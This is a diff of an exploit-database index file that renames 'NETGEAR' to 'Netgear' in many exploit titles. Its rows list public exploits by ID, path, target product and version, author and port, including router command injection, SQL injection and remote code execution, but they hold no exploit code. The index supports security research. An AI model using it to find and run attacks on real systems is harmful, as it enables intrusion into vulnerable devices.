+41598,exploits/cgi/remote/41598.rb,"Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
 41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
 41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
@@ -17636,7 +17637,7 @@ id,file,description,date,author,type,platform,port
 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,
 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
-41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
+41719,exploits/hardware/remote/41719.rb,"Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,
 41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows,
 41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple,
@@ -17694,7 +17695,7 @@ id,file,description,date,author,type,platform,port
 42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",remote,windows,
 42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,remote,windows,
 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443
-42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80
+42257,exploits/cgi/remote/42257.rb,"Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80
 42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000
 42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,
 42288,exploits/android/remote/42288.txt,"BestSafe Browser - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
@@ -17820,7 +17821,7 @@ id,file,description,date,author,type,platform,port
 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
-44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
+44245,exploits/hardware/remote/44245.rb,"Netgear - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
@@ -20763,7 +20764,7 @@ id,file,description,date,author,type,platform,port
 5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,webapps,php,
 5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,webapps,php,
 5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,webapps,php,
-5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",webapps,php,
+5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php,
 5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,webapps,php,
 5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,webapps,php,
 5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,webapps,php,
@@ -27356,7 +27357,7 @@ id,file,description,date,author,type,platform,port
 17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware,
 17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",webapps,php,
 17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",webapps,windows,
-17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware,
+17874,exploits/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware,
 17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,webapps,php,
 17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php,
 17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php,
@@ -29334,7 +29335,7 @@ id,file,description,date,author,type,platform,port
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,
 24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php,
 24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows,
-24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware,
+24441,exploits/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware,
 24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php,
 24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,webapps,php,
 24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,webapps,hardware,
@@ -29352,7 +29353,7 @@ id,file,description,date,author,type,platform,port
 24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php,
 24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php,
 24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,webapps,php,
-24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware,
+24464,exploits/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware,
 24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,webapps,php,
 24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,webapps,hardware,
 24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php,
@@ -29379,7 +29380,7 @@ id,file,description,date,author,type,platform,port
 24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,webapps,php,
 24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",webapps,php,
 24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php,
-24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware,
+24513,exploits/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware,
 24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,webapps,php,
 24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,webapps,php,
 24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",webapps,php,
@@ -29580,7 +29581,7 @@ id,file,description,date,author,type,platform,port
 24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",webapps,php,
 24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",webapps,php,
 24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple,
-24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware,
+24916,exploits/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware,
 24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",webapps,hardware,
 24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,webapps,hardware,
 24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,webapps,php,
@@ -30292,12 +30293,12 @@ id,file,description,date,author,type,platform,port
 25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",webapps,php,
 25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,webapps,asp,
 25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,
-25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware,
+25969,exploits/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware,
 25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php,
 25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,webapps,php,
 25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,hardware,
 25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,jsp,
-25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80
+25978,exploits/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80
 25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",webapps,asp,
 25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm,
 25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm,
@@ -31679,7 +31680,7 @@ id,file,description,date,author,type,platform,port
 27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,webapps,php,
 27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,webapps,php,
 27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",webapps,php,
-27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware,
+27774,exploits/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware,
 27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,webapps,linux,443
 27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",webapps,windows,
 27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php,
@@ -33577,7 +33578,7 @@ id,file,description,date,author,type,platform,port
 32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,webapps,asp,
 32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,webapps,php,
 32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",webapps,php,
-33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware,
+33984,exploits/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware,
 30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,webapps,php,
 30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,webapps,php,
 30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi,
@@ -34241,7 +34242,7 @@ id,file,description,date,author,type,platform,port
 31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php,
 31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,webapps,php,
 31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php,
-31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware,
+31617,exploits/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware,
 31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,webapps,ios,
 31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,webapps,java,
 31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,webapps,php,
@@ -35020,7 +35021,7 @@ id,file,description,date,author,type,platform,port
 32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php,
 32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,webapps,php,
 32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",webapps,asp,
-32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080
+32883,exploits/hardware/webapps/32883.txt,"Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080
 32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",webapps,hardware,8080
 32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",webapps,asp,
 32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,webapps,php,
@@ -35140,7 +35141,7 @@ id,file,description,date,author,type,platform,port
 33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,webapps,php,
 33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,webapps,hardware,
 33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php,
-33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware,
+33138,exploits/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware,
 33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,webapps,php,
 33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",webapps,php,
 33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",webapps,php,
@@ -35668,7 +35669,7 @@ id,file,description,date,author,type,platform,port
 34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,webapps,php,
 34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",webapps,hardware,80
 34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",webapps,php,80
-34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware,
+34149,exploits/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware,
 34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,webapps,php,
 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,
 34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple,
@@ -36418,7 +36419,7 @@ id,file,description,date,author,type,platform,port
 35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",webapps,php,80
 35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",webapps,php,
 35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",webapps,php,
-35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware,
+35325,exploits/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware,
 35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,
 35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php,
 35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,webapps,php,
@@ -37973,7 +37974,7 @@ id,file,description,date,author,type,platform,port
 37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,webapps,php,80
 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80
 37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",webapps,php,80
-37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware,
+37720,exploits/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware,
 37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php,
 37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",webapps,php,80
 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80
@@ -38151,7 +38152,7 @@ id,file,description,date,author,type,platform,port
 38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php,
 38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php,
 38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,webapps,php,
-38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80
+38097,exploits/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80
 38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,webapps,jsp,8081
 38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80
 38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",webapps,php,
@@ -38327,7 +38328,7 @@ id,file,description,date,author,type,platform,port
 38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",webapps,php,
 38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,webapps,php,
 38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",webapps,hardware,
-38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware,
+38449,exploits/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware,
 38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",webapps,php,
 38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",webapps,hardware,
 38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",webapps,php,
@@ -38797,7 +38798,7 @@ id,file,description,date,author,type,platform,port
 39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php,
 39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,webapps,php,80
 39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,webapps,php,80
-39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80
+39356,exploits/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80
 39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,webapps,multiple,
 39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,webapps,php,
 39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",webapps,php,80
@@ -38813,7 +38814,7 @@ id,file,description,date,author,type,platform,port
 39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
 39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",webapps,php,80
 39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",webapps,php,80
-39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware,
+39412,exploits/hardware/webapps/39412.txt,"Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware,
 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80
